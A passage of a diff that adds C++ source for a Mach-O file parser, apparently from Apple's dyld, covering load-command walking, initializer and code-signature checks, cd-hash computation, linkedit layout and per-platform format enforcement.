{ + if ( strncmp(info.segInfo.segName, "__DATA", 6) != 0 ) + return; + if ( (strcmp(info.sectName, "__objc_nlclslist") == 0) || (strcmp(info.sectName, "__objc_nlcatlist") == 0)) { + result = true; + stop = true; + } + }); + return result; +} + +uint32_t MachOFile::getFixupsLoadCommandFileOffset() const +{ + Diagnostics diag; + __block uint32_t fileOffset = 0; + this->forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_DYLD_INFO: + case LC_DYLD_INFO_ONLY: + fileOffset = (uint32_t)( (uint8_t*)cmd - (uint8_t*)this ); + break; + case LC_DYLD_CHAINED_FIXUPS: + fileOffset = (uint32_t)( (uint8_t*)cmd - (uint8_t*)this ); + break; + } + }); + if ( diag.hasError() ) + return 0; + + return fileOffset; +} + +bool MachOFile::hasInitializer(Diagnostics& diag) const +{ + __block bool result = false; + + // if dylib linked with -init linker option, that initializer is first + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( (cmd->cmd == LC_ROUTINES) || (cmd->cmd == LC_ROUTINES_64) ) { + result = true; + stop = true; + } + }); + + if ( result ) + return true; + + // next any function pointers in mod-init section + forEachInitializerPointerSection(diag, ^(uint32_t sectionOffset, uint32_t sectionSize, bool& stop) { + result = true; + stop = true; + }); + + if ( result ) + return true; + + forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& stop) { + if ( (info.sectFlags & SECTION_TYPE) != S_INIT_FUNC_OFFSETS ) + return; + result = true; + stop = true; + }); + + return result; +} + +void MachOFile::forEachInitializerPointerSection(Diagnostics& diag, void (^callback)(uint32_t sectionOffset, uint32_t sectionSize, bool& stop)) const +{ + const unsigned ptrSize = pointerSize(); + const uint64_t baseAddress = preferredLoadAddress(); + forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& sectStop) { + if ( (info.sectFlags & SECTION_TYPE) == S_MOD_INIT_FUNC_POINTERS ) { + if ( (info.sectSize % ptrSize) != 0 ) { + diag.error("initializer section %s/%s has bad size", info.segInfo.segName, info.sectName); + sectStop = true; + return; + } + if ( malformedSectionRange ) { + diag.error("initializer section %s/%s extends beyond its segment", info.segInfo.segName, info.sectName); + sectStop = true; + return; + } + if ( (info.sectAddr % ptrSize) != 0 ) { + diag.error("initializer section %s/%s is not pointer aligned", info.segInfo.segName, info.sectName); + sectStop = true; + return; + } + callback((uint32_t)(info.sectAddr - baseAddress), (uint32_t)info.sectSize, sectStop); + } + }); +} + +bool MachOFile::hasCodeSignature() const +{ + return this->hasLoadCommand(LC_CODE_SIGNATURE); +} + +bool MachOFile::hasCodeSignature(uint32_t& fileOffset, uint32_t& size) const +{ + fileOffset = 0; + size = 0; + + Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_CODE_SIGNATURE ) { + const linkedit_data_command* sigCmd = (linkedit_data_command*)cmd; + fileOffset = sigCmd->dataoff; + size = sigCmd->datasize; + stop = true; + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call + + // early exist if no LC_CODE_SIGNATURE + if ( fileOffset == 0 ) + return false; + + // ignore code signatures in macOS binaries built with pre-10.9 tools + if ( (this->cputype == CPU_TYPE_X86_64) || (this->cputype == CPU_TYPE_I386) ) { + __block bool foundPlatform = false; + __block bool badSignature = false; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + foundPlatform = true; + if ( (platform == Platform::macOS) && (sdk < 0x000A0900) ) + badSignature = true; + }); + return foundPlatform && !badSignature; + } + + return true; +} + +uint64_t MachOFile::mappedSize() const +{ + uint64_t vmSpace; + bool hasZeroFill; + analyzeSegmentsLayout(vmSpace, hasZeroFill); + return vmSpace; +} + +void MachOFile::analyzeSegmentsLayout(uint64_t& vmSpace, bool& hasZeroFill) const +{ + __block bool writeExpansion = false; + __block uint64_t lowestVmAddr = 0xFFFFFFFFFFFFFFFFULL; + __block uint64_t highestVmAddr = 0; + __block uint64_t sumVmSizes = 0; + forEachSegment(^(const SegmentInfo& segmentInfo, bool& stop) { + if ( strcmp(segmentInfo.segName, "__PAGEZERO") == 0 ) + return; + if ( segmentInfo.writable() && (segmentInfo.fileSize != segmentInfo.vmSize) ) + writeExpansion = true; // zerofill at end of __DATA + if ( segmentInfo.vmSize == 0 ) { + // Always zero fill if we have zero-sized segments + writeExpansion = true; + } + if ( segmentInfo.vmAddr < lowestVmAddr ) + lowestVmAddr = segmentInfo.vmAddr; + if ( segmentInfo.vmAddr+segmentInfo.vmSize > highestVmAddr ) + highestVmAddr = segmentInfo.vmAddr+segmentInfo.vmSize; + sumVmSizes += segmentInfo.vmSize; + }); + uint64_t totalVmSpace = (highestVmAddr - lowestVmAddr); + // LINKEDIT vmSize is not required to be a multiple of page size. Round up if that is the case + const uint64_t pageSize = uses16KPages() ? 0x4000 : 0x1000; + totalVmSpace = (totalVmSpace + (pageSize - 1)) & ~(pageSize - 1); + bool hasHole = (totalVmSpace != sumVmSizes); // segments not contiguous + + // The aux KC may have __DATA first, in which case we always want to vm_copy to the right place + bool hasOutOfOrderSegments = false; +#if BUILDING_APP_CACHE_UTIL + uint64_t textSegVMAddr = preferredLoadAddress(); + hasOutOfOrderSegments = textSegVMAddr != lowestVmAddr; +#endif + + vmSpace = totalVmSpace; + hasZeroFill = writeExpansion || hasHole || hasOutOfOrderSegments; +} + +uint32_t MachOFile::segmentCount() const +{ + __block uint32_t count = 0; + forEachSegment(^(const SegmentInfo& info, bool& stop) { + ++count; + }); + return count; +} + + +void MachOFile::forEachDOFSection(Diagnostics& diag, void (^callback)(uint32_t offset)) const +{ + forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool &stop) { + if ( ( (info.sectFlags & SECTION_TYPE) == S_DTRACE_DOF ) && !malformedSectionRange ) { + callback((uint32_t)(info.sectAddr - info.segInfo.vmAddr)); + } + }); +} + +bool MachOFile::hasExportTrie(uint32_t& runtimeOffset, uint32_t& size) const +{ + __block uint64_t textUnslidVMAddr = 0; + __block uint64_t linkeditUnslidVMAddr = 0; + __block uint64_t linkeditFileOffset = 0; + forEachSegment(^(const SegmentInfo& info, bool& stop) { + if ( strcmp(info.segName, "__TEXT") == 0 ) { + textUnslidVMAddr = info.vmAddr; + } else if ( strcmp(info.segName, "__LINKEDIT") == 0 ) { + linkeditUnslidVMAddr = info.vmAddr; + linkeditFileOffset = info.fileOffset; + stop = true; + } + }); + + Diagnostics diag; + __block uint32_t fileOffset = ~0U; + this->forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_DYLD_INFO: + case LC_DYLD_INFO_ONLY: { + const auto* dyldInfo = (const dyld_info_command*)cmd; + fileOffset = dyldInfo->export_off; + size = dyldInfo->export_size; + break; + } + case LC_DYLD_EXPORTS_TRIE: { + const auto* linkeditCmd = (const linkedit_data_command*)cmd; + fileOffset = linkeditCmd->dataoff; + size = linkeditCmd->datasize; + break; + } + } + }); + if ( diag.hasError() ) + return false; + + if ( fileOffset == ~0U ) + return false; + + runtimeOffset = (uint32_t)((fileOffset - linkeditFileOffset) + (linkeditUnslidVMAddr - textUnslidVMAddr)); + return true; +} + +#if !TARGET_OS_EXCLAVEKIT +// Note, this has to match the kernel +static const uint32_t hashPriorities[] = { + CS_HASHTYPE_SHA1, + CS_HASHTYPE_SHA256_TRUNCATED, + CS_HASHTYPE_SHA256, + CS_HASHTYPE_SHA384, +}; + +static unsigned int hash_rank(const CS_CodeDirectory *cd) +{ + uint32_t type = cd->hashType; + for (uint32_t n = 0; n < sizeof(hashPriorities) / sizeof(hashPriorities[0]); ++n) { + if (hashPriorities[n] == type) + return n + 1; + } + + /* not supported */ + return 0; +} + +// Note, this does NOT match the kernel. +// On watchOS, in main executables, we will record all cd hashes then make sure +// one of the ones we record matches the kernel. +// This list is only for dylibs where we embed the cd hash in the closure instead of the +// mod time and inode +// This is sorted so that we choose sha1 first when checking dylibs +static const uint32_t hashPriorities_watchOS_dylibs[] = { + CS_HASHTYPE_SHA256_TRUNCATED, + CS_HASHTYPE_SHA256, + CS_HASHTYPE_SHA384, + CS_HASHTYPE_SHA1 +}; + +static unsigned int hash_rank_watchOS_dylibs(const CS_CodeDirectory *cd) +{ + uint32_t type = cd->hashType; + for (uint32_t n = 0; n < sizeof(hashPriorities_watchOS_dylibs) / sizeof(hashPriorities_watchOS_dylibs[0]); ++n) { + if (hashPriorities_watchOS_dylibs[n] == type) + return n + 1; + } + + /* not supported */ + return 0; +} + +// This calls the callback for all code directories required for a given platform/binary combination. +// On watchOS main executables this is all cd hashes. +// On watchOS dylibs this is only the single cd hash we need (by rank defined by dyld, not the kernel). +// On all other platforms this always returns a single best cd hash (ranked to match the kernel). +// Note the callback parameter is really a CS_CodeDirectory. +void MachOFile::forEachCodeDirectoryBlob(const void* codeSigStart, size_t codeSignLen, + void (^callback)(const void* cd)) const +{ + // verify min length of overall code signature + if ( codeSignLen < sizeof(CS_SuperBlob) ) + return; + + // verify magic at start + const CS_SuperBlob* codeSuperBlob = (CS_SuperBlob*)codeSigStart; + if ( codeSuperBlob->magic != htonl(CSMAGIC_EMBEDDED_SIGNATURE) ) + return; + + // verify count of sub-blobs not too large + uint32_t subBlobCount = htonl(codeSuperBlob->count); + if ( (codeSignLen-sizeof(CS_SuperBlob))/sizeof(CS_BlobIndex) < subBlobCount ) + return; + + // Note: The kernel sometimes chooses sha1 on watchOS, and sometimes sha256. + // Embed all of them so that we just need to match any of them + const bool isWatchOS = this->builtForPlatform(Platform::watchOS); + const bool isMainExecutable = this->isMainExecutable(); + auto hashRankFn = isWatchOS ? &hash_rank_watchOS_dylibs : &hash_rank; + + // walk each sub blob, looking at ones with type CSSLOT_CODEDIRECTORY + const CS_CodeDirectory* bestCd = nullptr; + for (uint32_t i=0; i < subBlobCount; ++i) { + if ( codeSuperBlob->index[i].type == htonl(CSSLOT_CODEDIRECTORY) ) { + // Ok, this is the regular code directory + } else if ( codeSuperBlob->index[i].type >= htonl(CSSLOT_ALTERNATE_CODEDIRECTORIES) && codeSuperBlob->index[i].type <= htonl(CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT)) { + // Ok, this is the alternative code directory + } else { + continue; + } + uint32_t cdOffset = htonl(codeSuperBlob->index[i].offset); + // verify offset is not out of range + if ( cdOffset > (codeSignLen - sizeof(CS_CodeDirectory)) ) + continue; + const CS_CodeDirectory* cd = (CS_CodeDirectory*)((uint8_t*)codeSuperBlob + cdOffset); + uint32_t cdLength = htonl(cd->length); + // verify code directory length not out of range + if ( cdLength > (codeSignLen - cdOffset) ) + continue; + + // The watch main executable wants to know about all cd hashes + if ( isWatchOS && isMainExecutable ) { + callback(cd); + continue; + } + + if ( cd->magic == htonl(CSMAGIC_CODEDIRECTORY) ) { + if ( !bestCd || (hashRankFn(cd) > hashRankFn(bestCd)) ) + bestCd = cd; + } + } + + // Note this callback won't happen on watchOS as that one was done in the loop + if ( bestCd != nullptr ) + callback(bestCd); +} + +void MachOFile::forEachCDHashOfCodeSignature(const void* codeSigStart, size_t codeSignLen, + void (^callback)(const uint8_t cdHash[20])) const +{ + forEachCodeDirectoryBlob(codeSigStart, codeSignLen, ^(const void *cdBuffer) { + const CS_CodeDirectory* cd = (const CS_CodeDirectory*)cdBuffer; + uint32_t cdLength = htonl(cd->length); + uint8_t cdHash[20]; + if ( cd->hashType == CS_HASHTYPE_SHA384 ) { + uint8_t digest[CCSHA384_OUTPUT_SIZE]; + const struct ccdigest_info* di = ccsha384_di(); + ccdigest_di_decl(di, tempBuf); // declares tempBuf array in stack + ccdigest_init(di, tempBuf); + ccdigest_update(di, tempBuf, cdLength, cd); + ccdigest_final(di, tempBuf, digest); + ccdigest_di_clear(di, tempBuf); + // cd-hash of sigs that use SHA384 is the first 20 bytes of the SHA384 of the code digest + memcpy(cdHash, digest, 20); + callback(cdHash); + return; + } + else if ( (cd->hashType == CS_HASHTYPE_SHA256) || (cd->hashType == CS_HASHTYPE_SHA256_TRUNCATED) ) { + uint8_t digest[CCSHA256_OUTPUT_SIZE]; + const struct ccdigest_info* di = ccsha256_di(); + ccdigest_di_decl(di, tempBuf); // declares tempBuf array in stack + ccdigest_init(di, tempBuf); + ccdigest_update(di, tempBuf, cdLength, cd); + ccdigest_final(di, tempBuf, digest); + ccdigest_di_clear(di, tempBuf); + // cd-hash of sigs that use SHA256 is the first 20 bytes of the SHA256 of the code digest + memcpy(cdHash, digest, 20); + callback(cdHash); + return; + } + else if ( cd->hashType == CS_HASHTYPE_SHA1 ) { + // compute hash directly into return buffer + const struct ccdigest_info* di = ccsha1_di(); + ccdigest_di_decl(di, tempBuf); // declares tempBuf array in stack + ccdigest_init(di, tempBuf); + ccdigest_update(di, tempBuf, cdLength, cd); + ccdigest_final(di, tempBuf, cdHash); + ccdigest_di_clear(di, tempBuf); + callback(cdHash); + return; + } + }); +} +#endif // !TARGET_OS_EXCLAVEKIT + +// These are mangled symbols for all the variants of operator new and delete +// which a main executable can define (non-weak) and override the +// weak-def implementation in the OS. +static const char* const sTreatAsWeak[] = { + "__Znwm", "__ZnwmRKSt9nothrow_t", + "__Znam", "__ZnamRKSt9nothrow_t", + "__ZdlPv", "__ZdlPvRKSt9nothrow_t", "__ZdlPvm", + "__ZdaPv", "__ZdaPvRKSt9nothrow_t", "__ZdaPvm", + "__ZnwmSt11align_val_t", "__ZnwmSt11align_val_tRKSt9nothrow_t", + "__ZnamSt11align_val_t", "__ZnamSt11align_val_tRKSt9nothrow_t", + "__ZdlPvSt11align_val_t", "__ZdlPvSt11align_val_tRKSt9nothrow_t", "__ZdlPvmSt11align_val_t", + "__ZdaPvSt11align_val_t", "__ZdaPvSt11align_val_tRKSt9nothrow_t", "__ZdaPvmSt11align_val_t", + "__ZnwmSt19__type_descriptor_t", "__ZnamSt19__type_descriptor_t" +}; + +void MachOFile::forEachTreatAsWeakDef(void (^handler)(const char* symbolName)) +{ + for (const char* sym : sTreatAsWeak) + handler(sym); +} + +MachOFile::PointerMetaData::PointerMetaData() +{ + this->diversity = 0; + this->high8 = 0; + this->authenticated = 0; + this->key = 0; + this->usesAddrDiversity = 0; +} + +MachOFile::PointerMetaData::PointerMetaData(const ChainedFixupPointerOnDisk* fixupLoc, uint16_t pointer_format) +{ + this->diversity = 0; + this->high8 = 0; + this->authenticated = 0; + this->key = 0; + this->usesAddrDiversity = 0; + switch ( pointer_format ) { + case DYLD_CHAINED_PTR_ARM64E: + case DYLD_CHAINED_PTR_ARM64E_KERNEL: + case DYLD_CHAINED_PTR_ARM64E_USERLAND: + case DYLD_CHAINED_PTR_ARM64E_FIRMWARE: + case DYLD_CHAINED_PTR_ARM64E_USERLAND24: + this->authenticated = fixupLoc->arm64e.authRebase.auth; + if ( this->authenticated ) { + this->key = fixupLoc->arm64e.authRebase.key; + this->usesAddrDiversity = fixupLoc->arm64e.authRebase.addrDiv; + this->diversity = fixupLoc->arm64e.authRebase.diversity; + } + else if ( fixupLoc->arm64e.bind.bind == 0 ) { + this->high8 = fixupLoc->arm64e.rebase.high8; + } + break; + case DYLD_CHAINED_PTR_64: + case DYLD_CHAINED_PTR_64_OFFSET: + if ( fixupLoc->generic64.bind.bind == 0 ) + this->high8 = fixupLoc->generic64.rebase.high8; + break; + } +} + +bool MachOFile::PointerMetaData::operator==(const PointerMetaData& other) const +{ + return (this->diversity == other.diversity) + && (this->high8 == other.high8) + && (this->authenticated == other.authenticated) + && (this->key == other.key) + && (this->usesAddrDiversity == other.usesAddrDiversity); +} + +#if !SUPPORT_VM_LAYOUT +bool MachOFile::getLinkeditLayout(Diagnostics& diag, mach_o::LinkeditLayout& layout) const +{ + // Note, in file layout all linkedit offsets are just file offsets. + // It is essential no-one calls this on a MachOLoaded or MachOAnalyzer + + // FIXME: Other load commands + this->forEachLoadCommand(diag, ^(const load_command *cmd, bool &stop) { + switch ( cmd->cmd ) { + case LC_SYMTAB: { + const symtab_command* symTabCmd = (const symtab_command*)cmd; + + // Record that we found a LC_SYMTAB + layout.hasSymTab = true; + + // NList + uint64_t nlistEntrySize = this->is64() ? sizeof(struct nlist_64) : sizeof(struct nlist); + layout.symbolTable.fileOffset = symTabCmd->symoff; + layout.symbolTable.buffer = (uint8_t*)this + symTabCmd->symoff; + layout.symbolTable.bufferSize = (uint32_t)(symTabCmd->nsyms * nlistEntrySize); + layout.symbolTable.entryCount = symTabCmd->nsyms; + layout.symbolTable.hasLinkedit = true; + + // Symbol strings + layout.symbolStrings.fileOffset = symTabCmd->stroff; + layout.symbolStrings.buffer = (uint8_t*)this + symTabCmd->stroff; + layout.symbolStrings.bufferSize = symTabCmd->strsize; + layout.symbolStrings.hasLinkedit = true; + break; + } + case LC_DYSYMTAB: { + const dysymtab_command* dynSymTabCmd = (const dysymtab_command*)cmd; + + // Record that we found a LC_DYSYMTAB + layout.hasDynSymTab = true; + + // Local relocs + layout.localRelocs.fileOffset = dynSymTabCmd->locreloff; + layout.localRelocs.buffer = (uint8_t*)this + dynSymTabCmd->locreloff; + layout.localRelocs.bufferSize = 0; // Use entryCount instead + layout.localRelocs.entryIndex = 0; // Use buffer instead + layout.localRelocs.entryCount = dynSymTabCmd->nlocrel; + layout.localRelocs.hasLinkedit = true; + + // Extern relocs + layout.externRelocs.fileOffset = dynSymTabCmd->extreloff; + layout.externRelocs.buffer = (uint8_t*)this + dynSymTabCmd->extreloff; + layout.externRelocs.bufferSize = 0; // Use entryCount instead + layout.externRelocs.entryIndex = 0; // Use buffer instead + layout.externRelocs.entryCount = dynSymTabCmd->nextrel; + layout.externRelocs.hasLinkedit = true; + + // Indirect symbol table + layout.indirectSymbolTable.fileOffset = dynSymTabCmd->indirectsymoff; + layout.indirectSymbolTable.buffer = (uint8_t*)this + dynSymTabCmd->indirectsymoff; + layout.indirectSymbolTable.bufferSize = 0; // Use entryCount instead + layout.indirectSymbolTable.entryIndex = 0; // Use buffer instead + layout.indirectSymbolTable.entryCount = dynSymTabCmd->nindirectsyms; + layout.indirectSymbolTable.hasLinkedit = true; + + // Locals + layout.localSymbolTable.fileOffset = 0; // unused + layout.localSymbolTable.buffer = nullptr; // Use entryIndex instead + layout.localSymbolTable.bufferSize = 0; // Use entryCount instead + layout.localSymbolTable.entryIndex = dynSymTabCmd->ilocalsym; + layout.localSymbolTable.entryCount = dynSymTabCmd->nlocalsym; + layout.localSymbolTable.hasLinkedit = true; + + // Globals + layout.globalSymbolTable.fileOffset = 0; // unused + layout.globalSymbolTable.buffer = nullptr; // Use entryIndex instead + layout.globalSymbolTable.bufferSize = 0; // Use entryCount instead + layout.globalSymbolTable.entryIndex = dynSymTabCmd->iextdefsym; + layout.globalSymbolTable.entryCount = dynSymTabCmd->nextdefsym; + layout.globalSymbolTable.hasLinkedit = true; + + // Imports + layout.undefSymbolTable.fileOffset = 0; // unused + layout.undefSymbolTable.buffer = nullptr; // Use entryIndex instead + layout.undefSymbolTable.bufferSize = 0; // Use entryCount instead + layout.undefSymbolTable.entryIndex = dynSymTabCmd->iundefsym; + layout.undefSymbolTable.entryCount = dynSymTabCmd->nundefsym; + layout.undefSymbolTable.hasLinkedit = true; + break; + } + case LC_DYLD_INFO: + case LC_DYLD_INFO_ONLY: { + const dyld_info_command* linkeditCmd = (const dyld_info_command*)cmd; + + // Record what kind of DYLD_INFO we found + layout.dyldInfoCmd = cmd->cmd; + + // Rebase + layout.rebaseOpcodes.fileOffset = linkeditCmd->rebase_off; + layout.rebaseOpcodes.buffer = (uint8_t*)this + linkeditCmd->rebase_off; + layout.rebaseOpcodes.bufferSize = linkeditCmd->rebase_size; + layout.rebaseOpcodes.hasLinkedit = true; + + // Bind + layout.regularBindOpcodes.fileOffset = linkeditCmd->bind_off; + layout.regularBindOpcodes.buffer = (uint8_t*)this + linkeditCmd->bind_off; + layout.regularBindOpcodes.bufferSize = linkeditCmd->bind_size; + layout.regularBindOpcodes.hasLinkedit = true; + + // Lazy bind + layout.lazyBindOpcodes.fileOffset = linkeditCmd->lazy_bind_off; + layout.lazyBindOpcodes.buffer = (uint8_t*)this + linkeditCmd->lazy_bind_off; + layout.lazyBindOpcodes.bufferSize = linkeditCmd->lazy_bind_size; + layout.lazyBindOpcodes.hasLinkedit = true; + + // Weak bind + layout.weakBindOpcodes.fileOffset = linkeditCmd->weak_bind_off; + layout.weakBindOpcodes.buffer = (uint8_t*)this + linkeditCmd->weak_bind_off; + layout.weakBindOpcodes.bufferSize = linkeditCmd->weak_bind_size; + layout.weakBindOpcodes.hasLinkedit = true; + + // Export trie + layout.exportsTrie.fileOffset = linkeditCmd->export_off; + layout.exportsTrie.buffer = (uint8_t*)this + linkeditCmd->export_off; + layout.exportsTrie.bufferSize = linkeditCmd->export_size; + layout.exportsTrie.hasLinkedit = true; + break; + } + case LC_DYLD_CHAINED_FIXUPS: { + const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.chainedFixups.fileOffset = linkeditCmd->dataoff; + layout.chainedFixups.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.chainedFixups.bufferSize = linkeditCmd->datasize; + layout.chainedFixups.entryCount = 0; // Not needed here + layout.chainedFixups.hasLinkedit = true; + layout.chainedFixups.cmd = linkeditCmd; + break; + } + case LC_DYLD_EXPORTS_TRIE: { + const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.exportsTrie.fileOffset = linkeditCmd->dataoff; + layout.exportsTrie.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.exportsTrie.bufferSize = linkeditCmd->datasize; + layout.exportsTrie.entryCount = 0; // Not needed here + layout.exportsTrie.hasLinkedit = true; + break; + } + case LC_SEGMENT_SPLIT_INFO: { + const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.splitSegInfo.fileOffset = linkeditCmd->dataoff; + layout.splitSegInfo.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.splitSegInfo.bufferSize = linkeditCmd->datasize; + layout.splitSegInfo.entryCount = 0; // Not needed here + layout.splitSegInfo.hasLinkedit = true; + break; + } + case LC_FUNCTION_STARTS: { + const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.functionStarts.fileOffset = linkeditCmd->dataoff; + layout.functionStarts.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.functionStarts.bufferSize = linkeditCmd->datasize; + layout.functionStarts.entryCount = 0; // Not needed here + layout.functionStarts.hasLinkedit = true; + break; + } + case LC_DATA_IN_CODE: { + const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.dataInCode.fileOffset = linkeditCmd->dataoff; + layout.dataInCode.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.dataInCode.bufferSize = linkeditCmd->datasize; + layout.dataInCode.entryCount = 0; // Not needed here + layout.dataInCode.hasLinkedit = true; + break; + } + case LC_CODE_SIGNATURE: { + const linkedit_data_command* linkeditCmd = (const linkedit_data_command*)cmd; + + layout.codeSignature.fileOffset = linkeditCmd->dataoff; + layout.codeSignature.buffer = (uint8_t*)this + linkeditCmd->dataoff; + layout.codeSignature.bufferSize = linkeditCmd->datasize; + layout.codeSignature.entryCount = 0; // Not needed here + layout.codeSignature.hasLinkedit = true; + break; + } + } + }); + + return true; +} + +void MachOFile::withFileLayout(Diagnostics &diag, void (^callback)(const mach_o::Layout &layout)) const +{ + // Use the fixups from the source dylib + mach_o::LinkeditLayout linkedit; + if ( !this->getLinkeditLayout(diag, linkedit) ) { + diag.error("Couldn't get dylib layout"); + return; + } + + uint32_t numSegments = this->segmentCount(); + BLOCK_ACCCESSIBLE_ARRAY(mach_o::SegmentLayout, segmentLayout, numSegments); + this->forEachSegment(^(const SegmentInfo &info, bool &stop) { + mach_o::SegmentLayout segment; + segment.vmAddr = info.vmAddr; + segment.vmSize = info.vmSize; + segment.fileOffset = info.fileOffset; + segment.fileSize = info.fileSize; + segment.buffer = (uint8_t*)this + info.fileOffset; + segment.protections = info.protections; + + segment.kind = mach_o::SegmentLayout::Kind::unknown; + if ( !strcmp(info.segName, "__TEXT") ) { + segment.kind = mach_o::SegmentLayout::Kind::text; + } else if ( !strcmp(info.segName, "__LINKEDIT") ) { + segment.kind = mach_o::SegmentLayout::Kind::linkedit; + } + + segmentLayout[info.segIndex] = segment; + }); + + mach_o::Layout layout(this, { &segmentLayout[0], &segmentLayout[numSegments] }, linkedit); + callback(layout); +} +#endif // !SUPPORT_VM_LAYOUT + +bool MachOFile::hasObjCMessageReferences() const { + + __block bool foundSection = false; + forEachSection(^(const SectionInfo& sectInfo, bool malformedSectionRange, bool& stop) { + if ( strncmp(sectInfo.segInfo.segName, "__DATA", 6) != 0 ) + return; + if ( strcmp(sectInfo.sectName, "__objc_msgrefs") != 0 ) + return; + foundSection = true; + stop = true; + }); + return foundSection; +} + +uint32_t MachOFile::loadCommandsFreeSpace() const +{ + __block uint32_t firstSectionFileOffset = 0; + __block uint32_t firstSegmentFileOffset = 0; + forEachSection(^(const SectionInfo& sectInfo, bool malformedSectionRange, bool& stop) { + firstSectionFileOffset = sectInfo.sectFileOffset; + firstSegmentFileOffset = (uint32_t)sectInfo.segInfo.fileOffset; + stop = true; + }); + + uint32_t headerSize = (this->magic == MH_MAGIC_64) ? sizeof(mach_header_64) : sizeof(mach_header); + uint32_t existSpaceUsed = this->sizeofcmds + headerSize; + return firstSectionFileOffset - firstSegmentFileOffset - existSpaceUsed; +} + +bool MachOFile::findObjCDataSection(const char *sectionName, uint64_t& sectionRuntimeOffset, uint64_t& sectionSize) const +{ + uint64_t baseAddress = preferredLoadAddress(); + + __block bool foundSection = false; + forEachSection(^(const SectionInfo& sectInfo, bool malformedSectionRange, bool& stop) { + if ( (strcmp(sectInfo.segInfo.segName, "__DATA") != 0) && + (strcmp(sectInfo.segInfo.segName, "__DATA_CONST") != 0) && + (strcmp(sectInfo.segInfo.segName, "__DATA_DIRTY") != 0) ) + return; + if ( strcmp(sectInfo.sectName, sectionName) != 0 ) + return; + foundSection = true; + sectionRuntimeOffset = sectInfo.sectAddr - baseAddress; + sectionSize = sectInfo.sectSize; + stop = true; + }); + return foundSection; +} + +bool MachOFile::enforceFormat(Malformed kind) const +{ + // TODO: Add a mapping from generic releases to platform versions +#if BUILDING_DYLDINFO || BUILDING_APP_CACHE_UTIL || BUILDING_RUN_STATIC + // HACK: If we are the kernel, we have a different format to enforce + if ( isFileSet() ) { + bool result = false; + switch (kind) { + case Malformed::linkeditOrder: + case Malformed::linkeditAlignment: + case Malformed::dyldInfoAndlocalRelocs: + result = true; + break; + case Malformed::segmentOrder: + // The aux KC has __DATA first + result = false; + break; + case Malformed::linkeditPermissions: + case Malformed::executableData: + case Malformed::writableData: + case Malformed::codeSigAlignment: + case Malformed::sectionsAddrRangeWithinSegment: + case Malformed::loaderPathsAreReal: + case Malformed::mainExecInDyldCache: + result = true; + break; + case Malformed::noLinkedDylibs: + case Malformed::textPermissions: + // The kernel has its own __TEXT_EXEC for executable memory + result = false; + break; + case Malformed::noUUID: + case Malformed::zerofillSwiftMetadata: + case Malformed::sdkOnOrAfter2021: + case Malformed::sdkOnOrAfter2022: + result = true; + break; + } + return result; + } + + if ( isStaticExecutable() ) { + bool result = false; + switch (kind) { + case Malformed::linkeditOrder: + case Malformed::linkeditAlignment: + case Malformed::dyldInfoAndlocalRelocs: + result = true; + break; + case Malformed::segmentOrder: + case Malformed::textPermissions: + result = false; + break; + case Malformed::linkeditPermissions: + case Malformed::executableData: + case Malformed::codeSigAlignment: + case Malformed::sectionsAddrRangeWithinSegment: + case Malformed::loaderPathsAreReal: + case Malformed::mainExecInDyldCache: + result = true; + break; + case Malformed::noLinkedDylibs: + case Malformed::writableData: + case Malformed::noUUID: + case Malformed::zerofillSwiftMetadata: + case Malformed::sdkOnOrAfter2021: + case Malformed::sdkOnOrAfter2022: + // The kernel has __DATA_CONST marked as r/o + result = false; + break; + } + return result; + } + +#endif + + __block bool result = false; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + switch (platform) { + case Platform::macOS: + switch (kind) { + case Malformed::linkeditOrder: + case Malformed::linkeditAlignment: + case Malformed::dyldInfoAndlocalRelocs: + // enforce these checks on new binaries only + if (sdk >= 0x000A0E00) // macOS 10.14 + result = true; + break; + case Malformed::segmentOrder: + case Malformed::linkeditPermissions: + case Malformed::textPermissions: + case Malformed::executableData: + case Malformed::writableData: + case Malformed::codeSigAlignment: + // enforce these checks on new binaries only + if (sdk >= 0x000A0F00) // macOS 10.15 + result = true; + break; + case Malformed::sectionsAddrRangeWithinSegment: + // enforce these checks on new binaries only + if (sdk >= 0x000A1000) // macOS 10.16 + result = true; + break; + case Malformed::noLinkedDylibs: + case Malformed::loaderPathsAreReal: + case Malformed::mainExecInDyldCache: + case Malformed::zerofillSwiftMetadata: + case Malformed::sdkOnOrAfter2021: + // enforce these checks on new binaries only + if (sdk >= 0x000D0000) // macOS 13.0 + result = true; + break; + case Malformed::noUUID: + case Malformed::sdkOnOrAfter2022: + if (sdk >= 0x000E0000) // macOS 14.0 FIXME + result = true; + break; + } + break; + case Platform::iOS: + case Platform::tvOS: + case Platform::iOSMac: + switch (kind) { + case Malformed::linkeditOrder: + case Malformed::dyldInfoAndlocalRelocs: + case Malformed::textPermissions: + case Malformed::executableData: + case Malformed::writableData: + result = true; + break; + case Malformed::linkeditAlignment: + case Malformed::segmentOrder: + case Malformed::linkeditPermissions: + case Malformed::codeSigAlignment: + // enforce these checks on new binaries only + if (sdk >= 0x000D0000) // iOS 13 + result = true; + break; + case Malformed::sectionsAddrRangeWithinSegment: + // enforce these checks on new binaries only + if (sdk >= 0x000E0000) // iOS 14 + result = true; + break; + case Malformed::noLinkedDylibs: + case 